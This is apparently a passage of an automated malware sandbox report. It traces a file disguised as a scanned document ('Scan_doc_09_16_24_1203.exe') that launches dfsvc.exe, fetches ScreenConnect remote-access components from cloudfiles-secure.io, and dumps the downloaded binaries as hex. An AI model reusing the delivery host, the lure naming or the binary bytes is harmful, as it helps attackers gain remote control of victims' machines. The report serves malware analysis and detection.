                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
                                                                                                                                                                                                                2024-10-02 04:16:38 UTC16384INData Raw: 00 0a 2a 00 00 1b 30 06 00 ef 0d 00 00 2c 00 00 11 73 ab 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 25 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 36 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4a 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4a 06 00 06 13 08 11 04 7b 16 03 00 04 6f 15 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a
                                                                                                                                                                                                                Data Ascii: *0,s}(u,rp(v(w(x}H((((~%-&~%s%(3+o8$o}{(,+{o(6{o)(J{o*(J{o(%o
                                                                                                                                                                                                                2024-10-02 04:16:38 UTC16384INData Raw: 02 7b 54 00 00 04 6f 0b 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 14 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f b8 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 14 03 00 0a 74 9a 00 00 01 17 6f 15 03 00 0a 26 02 7b 54 00 00 04 14 6f 7b 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0b 07 00 06 8c b6 00 00 02 a2 28 07 03 00 0a 02 7b 54 00 00 04 6f 0b 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0a 03 00 0a 6f 45 01 00 0a 2b
                                                                                                                                                                                                                Data Ascii: {To.{To*0b{To,M{Z(o{To{T{Toto&{To{(<*(<*0Grp%3%{To({To..'+5{Z(o-"(soE+
                                                                                                                                                                                                                2024-10-02 04:16:38 UTC16384INData Raw: 73 27 04 00 0a 28 b2 00 00 2b 28 b3 00 00 2b 6f 28 04 00 0a 2a c2 02 28 29 04 00 0a 02 7e 2a 04 00 0a 28 2b 04 00 0a 02 20 02 60 00 00 17 28 2c 04 00 0a 02 02 fe 06 dd 01 00 06 73 2d 04 00 0a 28 2e 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02 7b 9f 00 00 04 2a 22 02 03 7d 9f 00 00 04 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 1e 02 7b a3 00 00 04 2a 22 02 03 7d a3 00 00 04 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00
                                                                                                                                                                                                                Data Ascii: s'(+(+o(*()~*(+ `(,s-(.*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}
                                                                                                                                                                                                                2024-10-02 04:16:38 UTC16384INData Raw: 00 0a 2c 07 02 28 a4 02 00 06 2a 02 6f 18 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 93 00 00 11 02 28 61 05 00 0a 2d 1d 02 28 9b 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 9b 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a2 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 a2 02 00 06 2a 02 6f 17 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 9f 02 00 06 2c 07 02 28 9f 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 a6 02 00 06 2c 07 02 28 a6 02 00 06 2a 02 6f c6 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 a1 02 00 06 2c 07 02 28 a1 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 aa 02 00 06 2c 07 02 28 aa 02 00 06 2a 02 28 99 02 00 06 2a 00 00 00 1b 30 06 00 f0 00 00 00 94 00 00 11 02 03 28 ce 01 00 06 02 6f c4 02 00 06 0a 12 00 28 63
                                                                                                                                                                                                                Data Ascii: ,(*o*0Q(a-((b,(*{,((b,(*o*(a-(,(*{,(,(*o*(a-(,(*{,(,(*(*0(o(c
                                                                                                                                                                                                                2024-10-02 04:16:38 UTC16384INData Raw: 08 06 00 0a 2a 32 02 7b 38 01 00 04 6f 09 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 0a 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 07 00 29 00 00 00 5a 00 00 11 02 02 7b 3a 01 00 04 73 8a 03 00 06 25 02 02 7b 39 01 00 04 0a 06 17 58 7d 39 01 00 04 06 6f 89 03 00 06 28 50 01 00 2b 2a 66 02 16 7d 39 01 00 04 02 28 83 03 00 06 02 7b 38 01 00 04 6f 0b 06 00 0a 2a 1e 02 28 83 03 00 06 2a 32 02 7b 38 01 00 04 6f 0c 06 00 0a 2a 32 02 7b 38 01 00 04 28 72 01
                                                                                                                                                                                                                Data Ascii: *2{8o*6{8o*0){:(t|:(O+3*0){:(t|:(O+3*0)Z{:s%{9X}9o(P+*f}9({8o*(*2{8o*2{8(r
                                                                                                                                                                                                                2024-10-02 04:16:38 UTC16384INData Raw: 7b 3d 05 00 04 2c 0b 06 7b 3d 05 00 04 6f 22 00 00 0a dc 06 7b 3c 05 00 04 2c 0b 06 7b 3c 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 60 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 ad 01 00 06 02 20 16 22 00 00 17 28 2c 04 00 0a 02 17 28 b1 07 00 0a 02 22 00 00 80 3f 7d 73 01 00 04 02 7e bb 05 00 0a 28 0d 05 00 06 73 82 05 00 0a 7d 74 01 00 04 02 18 17 16 16 02 73 b2 07 00 0a 7d 71 01 00 04 2a 00 00 13 30 03 00 29 00 00 00 16 00 00 11 02 7b 78 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 01 00 00 1b 0c 02 7c 78 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30
                                                                                                                                                                                                                Data Ascii: {=,{=o"{<,{<o",o"(`&*4iA5$0J( "(,("?}s~(s}ts}q*0){x(t|x(+3*0
                                                                                                                                                                                                                2024-10-02 04:16:38 UTC16384INData Raw: 28 d1 01 00 2b 7e 85 05 00 04 fe 06 dd 0a 00 06 73 60 01 00 0a 28 21 00 00 2b 0c 28 92 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 41 05 00 06 28 c3 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 92 08 00 0a 02 6f 41 05 00 06 28 c3 04 00 06 7e aa 00 00 0a 02 6f b0 03 00 0a 6f 93 08 00 0a 2a 2e 28 c2 04 00 06 6f 5e 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 4a 05 00 06 2a 2e 28 c2 04 00 06 6f 4c 05 00 06 2a 2e 28 c2 04 00 06 6f 48 05 00 06 2a 2e 28 c2 04 00 06 6f 42 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 46 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 62 05 00 06 2a 2e 28 c2 04 00 06 6f 64 05 00 06 2a 2e 28 c2 04 00 06 6f 66 05 00 06 2a 2e 28 c2 04
                                                                                                                                                                                                                Data Ascii: (+~s`(!+(%-&(oA(*~**(oA(~oo*.(o^*.(oD*.(oJ*.(oL*.(oH*.(oB*.(oD*.(oF*.(oD*.(ob*.(od*.(of*.(
                                                                                                                                                                                                                2024-10-02 04:16:38 UTC16384INData Raw: 0a 25 80 d2 05 00 04 16 28 21 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 41 01 00 11 73 9f 09 00 0a 0a 06 03 7d a0 09 00 0a 02 06 fe 06 a1 09 00 0a 73 a2 09 00 0a 15 28 16 02 00 2b 7e a3 09 00 0a 25 2d 17 26 7e a4 09 00 0a fe 06 a5 09 00 0a 73 a6 09 00 0a 25 80 a3 09 00 0a 28 17 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 42 01 00 11 7e a7 09 00 0a 72 18 40 00 70 02 8c 64 00 00 01 28 1d 06 00 0a 6f a8 09 00 0a 0a 06 14 fe 03 0b de 0a 06 2c 06 06 6f 22 00 00 0a dc 07 2a 00 00 01 10 00 00 02 00 1b 00 07 22 00 0a 00 00 00 00 aa 28 01 03 00 0a 1c 16 73 02 03 00 0a 28 03 03 00 0a 2c 15 d0 23 03 00 01 28 bf 00 00 0a 6f 93 07 00 0a 28 10 06 00 06 2a 16 2a 56 28 11 06 00 06 2d 07 02 73 f2 06 00 06 2a 02 73 ed 06 00 06 2a 66 28 11 06 00 06 2d 09 02 03 04 73 e9
                                                                                                                                                                                                                Data Ascii: %(!+*0EAs}s(+~%-&~s%(+*0.B~r@pd(o,o"*"(s(,#(o(**V(-s*s*f(-s
                                                                                                                                                                                                                2024-10-02 04:16:38 UTC16384INData Raw: 6f fc 01 00 0a 02 17 28 13 0b 00 0a 02 28 14 0b 00 0a 02 28 bb 01 00 0a 28 f9 01 00 0a 2a 76 02 28 23 08 00 0a 25 20 00 00 00 80 6f e5 04 00 0a 25 20 88 00 00 00 6f e6 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 91 01 00 11 0f 01 28 f0 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f3 01 00 0a 28 15 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f3 01 00 0a 28 86 00 00 0a 73 3b 05 00 0a 2a 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 f6 01 00 0a 17 28 10 07 00 06 0a 12 00 28 08 03 00 0a 2d 64 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 16 0b 00 0a 17 28 10 07 00 06 0b 12 01 28 08 03 00 0a 2d 3f 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 f1 01 00 0a 16 28 10 07 00 06 0c 12 02 28 08 03 00 0a 2d 1a 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 ed 01 00 0a 16 28 10 07 00 06
                                                                                                                                                                                                                Data Ascii: o((((*v(#% o% o*0(,+((((,((s;*(((((-d(((((-?(((((-((((


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                12192.168.2.449762178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:39 UTC95OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                2024-10-02 04:16:40 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 548864
                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:40 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:40 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
                                                                                                                                                                                                                2024-10-02 04:16:40 UTC16384INData Raw: 06 26 2a 1e 02 7b 6c 01 00 0a 2a 22 02 03 7d 6c 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6d 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 46 01 00 0a 0a 02 7b 6e 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 15 07 00 06 04 6f 15 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 15 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 15 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72
                                                                                                                                                                                                                Data Ascii: &*{l*"}l*:(<(m*0(<oF{n-(++,}n{n*>oo*>(o}p*03=-*(qo{p_,B{r,(stsu(,+&}p|r*o{p3{r
                                                                                                                                                                                                                2024-10-02 04:16:40 UTC16384INData Raw: 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c6 02 00 0a 0a 2b 30 03 04 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b5 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a7 0e 00 06 73 cb 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e9 04 00 06 28 80
                                                                                                                                                                                                                Data Ascii: :(}+(~+&*0TBE +(s+0s+&s+s+rpsz*Z(<(*~%-&~s%(+*0%(-*o(-*:((
                                                                                                                                                                                                                2024-10-02 04:16:40 UTC16384INData Raw: 00 d4 00 00 11 02 03 6f 3a 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 86 03 00 0a 02 06 17 58 6f f2 02 00 0a 28 59 00 00 2b 73 39 04 00 0a 2a fe 02 25 2d 06 26 7e 98 01 00 0a 03 6f 8c 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 b9 0e 00 06 73 9f 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 9a 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3b 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00
                                                                                                                                                                                                                Data Ascii: o:3*oXo(Y+s9*%-&~o~%-&~s%(+(n(r+*n((*>s%}*s'~%-&Ds;%(+*(+(+-j+j(L(+*&f__`*v(
                                                                                                                                                                                                                2024-10-02 04:16:40 UTC16384INData Raw: 00 fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 54 07 00 06 28 56 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 56 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 58 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5a 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5c 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5e 07 00 06 28 56 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 60 07 00 06 0b 12 01 fe 16 2c 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 62 07 00 06 0c 12 02 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 64 07 00 06 0d 12 03 28 2f 05 00 0a
                                                                                                                                                                                                                Data Ascii: %rp%(T(V%rp%(V(%rp%(X(%r"p%(Z(%r4p%(\(%r2p%(^(V%rHp%(`,oC%rhp%(b-oC%rp%(d(/
                                                                                                                                                                                                                2024-10-02 04:16:40 UTC16384INData Raw: 28 f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2a 06 00 0a 28 81 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2b 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 36 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3e 0a 00 06 5a 1e 28 19 04 00 06 02 28 3f 0a 00 06 58 2a 86 02 03 04 28 3d 0a 00 06 02 05 75 98 00 00 02 7d dc 03 00 04 02 05 75 97 00 00 02 7d dd 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b dc 03 00 04 28
                                                                                                                                                                                                                Data Ascii: (jX}{~*(+*0)Q{(+tO|(+3*0)Q{(-tO|(+3*V(6}}*{*{*Z(>Z((?X*(=u}u}*(c,{(
                                                                                                                                                                                                                2024-10-02 04:16:40 UTC16384INData Raw: 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 16 07 00 0a 0a 2b 26 06 6f 17 07 00 0a 0b 07 04 07 6f 0a 0c 00 06 02 05 07 6f 09 0c 00 06 28 0a 09 00 06 6f 0d 0c 00 06 28 02 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b 40 04 00 04 2a 1e 02 7b 41 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07
                                                                                                                                                                                                                Data Ascii: o-,o*290Dyo+&ooo(o(o-,o*29(<}=}>}?}@}A*{=*{>*{?*{@*{A*0G*~-:~(,~
                                                                                                                                                                                                                2024-10-02 04:16:40 UTC16384INData Raw: 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 60 01 00 0a 0a 03 04 0e 04 0e 05 06 28 32 02 00 0a 06 2a 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ac 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 b5 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 3b 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 36 02 00 06 2a 00 00 00 13 30 03 00 1b 00
                                                                                                                                                                                                                Data Ascii: :j******0iY(`(2*sjz(<*.s2*(<*2{3oB*(<*6{o{*(<*6{o{*.s8*(<*"(]*"(c*(<*0{;(+d(zo6*0
                                                                                                                                                                                                                2024-10-02 04:16:40 UTC16384INData Raw: 07 00 04 28 56 06 00 06 8c da 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 2f 0a 00 0a 16 6f 30 0a 00 0a 2a 36 02 7b 2f 0a 00 0a 17 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 22 05 00 0a 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 0b 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 22 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 12 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 52 0b 00 06 2a 3a 0f 01 fe 16 4e 01 00 02 6f 43 00 00 0a 2a 2e 73 16 10 00 06 80 2d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c4 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a
                                                                                                                                                                                                                Data Ascii: (V*(<*6{/o0*6{/o0*(<*J{"{#(1*(<*J{'{((1*.s%*(<*o"*oC*.s(*(<*oC*.s**(<*"(R*:NoC*.s-*(<*:oC*(<*
                                                                                                                                                                                                                2024-10-02 04:16:40 UTC16384INData Raw: 01 f7 02 01 00 10 00 4c b0 00 00 ad 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 89 2e 01 00 ad 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 ad 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 ad 3d 01 00 35 00 90 01 04 03 01 01 00 00 a0 6a 01 00 ad 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 ad 3d 01 00 c5 00 96 01 05 03 09 01 10 00 ba 36 01 00 ad 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 6c 50 01 00 ad 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 ad 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 1c 3b 01 00 ad 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 12 00 01 00 ad 3d 01 00 6d 00 a8 01 4d 03 81 01 10 00 52 3b 01 00 ad 3d 01 00 35 00 ab 01 61 03 01 20 10 00 84 e3 00 00 ad 3d 01 00 35 00 ad 01 6a 03 01 20 10 00 d3 34 01 00 ad 3d 01 00 35 00 b0 01 82 03
                                                                                                                                                                                                                Data Ascii: L=E.=mH&=+=5j==6=mlP=mO=m;=m&=mMR;=5a =5j 4=5


                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                Start time:00:16:16
                                                                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe"
                                                                                                                                                                                                                Imagebase:0x5e0000
                                                                                                                                                                                                                File size:83'368 bytes
                                                                                                                                                                                                                MD5 hash:0753315CBF45A34D4402E7B04A17FDDF
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                Start time:00:16:17
                                                                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                Imagebase:0x261f5290000
                                                                                                                                                                                                                File size:24'856 bytes
                                                                                                                                                                                                                MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:2
